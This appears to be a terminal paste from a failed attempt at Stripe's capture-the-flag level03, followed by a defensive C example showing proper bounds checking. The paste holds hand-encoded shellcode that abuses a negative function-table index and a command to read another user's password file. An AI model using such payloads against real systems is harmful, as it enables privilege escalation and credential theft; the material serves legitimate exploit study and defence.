- level03 fail - https://stripe.com/blog/capture-the-flag
- Here's what I'm doing:
- A negative 5 index points fns[index] to the (non-truncated) string on the stack, moving %eip there.
- The %eax register already has the address of the buffer so I add the length of the payload before the command string and set that as the first value on the stack. Then it calls run() or system directly.
- asm:
- add $0xd,%eax
- mov %eax,(%esp)
- mov $0x0804875b,%eax
- call *%eax
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<run>"
- 0804875b <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -o level03 /levels/level03.c
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
- 0804875b <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -fno-stack-protector -z execstack -o level03 /levels/level03.c
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
- 080486fb <run>:
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\xfb\x86\x04\x08\xff\xd0cat /home/level04/.password"`"
- cat: /home/level04/.password: Permission denied
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<system"
- 0804847c <system@plt>:
- 8048767: e8 10 fd ff ff call 804847c <system@plt>
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x7c\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
- Segmentation fault
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<system"
- 08048430 <system@plt>:
- 8048707: e8 24 fd ff ff call 8048430 <system@plt>
- level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x30\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
- cat: /home/level04/.password: Permission denied
- Segmentation fault
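
Seen from the defender's side, the negative index into fns[] described above is a missing lower-bound check on a signed value. The following C is an added example, not code from this paste or from the level03 source; the table, the handler names and NUM_FNS are hypothetical. It contrasts an upper-bound-only test with strict parsing and a two-sided range check before the function pointer is used.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

#define NUM_FNS 4   /* hypothetical table size */

typedef int (*fn_ptr)(const char *);

/* Hypothetical handlers standing in for the program's real ones. */
static int str_len(const char *s) { int n = 0; while (s[n]) n++; return n; }
static int first_byte(const char *s) { return (unsigned char)s[0]; }
static int is_empty(const char *s) { return s[0] == '\0'; }
static int always_zero(const char *s) { (void)s; return 0; }

static const fn_ptr fns[NUM_FNS] = { str_len, first_byte, is_empty, always_zero };

/* Weak form: only the upper bound is tested, so a signed -5 is accepted.
 * It only reports the decision; the table is never indexed with it here. */
int weak_index_ok(int index) { return index < NUM_FNS; }

/* Hardened form: reject empty input, trailing junk and overflow,
 * then enforce 0 <= v < NUM_FNS before converting to an unsigned index. */
int parse_index(const char *arg, size_t *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(arg, &end, 10);
    if (end == arg || *end != '\0' || errno == ERANGE) return -1;
    if (v < 0 || v >= NUM_FNS) return -1;
    *out = (size_t)v;
    return 0;
}

/* Calls through the table only after the index has been validated. */
int dispatch(const char *index_arg, const char *str, int *result)
{
    size_t idx;
    if (parse_index(index_arg, &idx) != 0) return -1;
    *result = fns[idx](str);
    return 0;
}

int main(void)
{
    int r = 0;
    printf("weak check accepts -5: %d\n", weak_index_ok(-5));
    printf("dispatch(\"-5\"): %d\n", dispatch("-5", "abc", &r));
    printf("dispatch(\"0\"): %d, result %d\n", dispatch("0", "abc", &r), r);
    return 0;
}
```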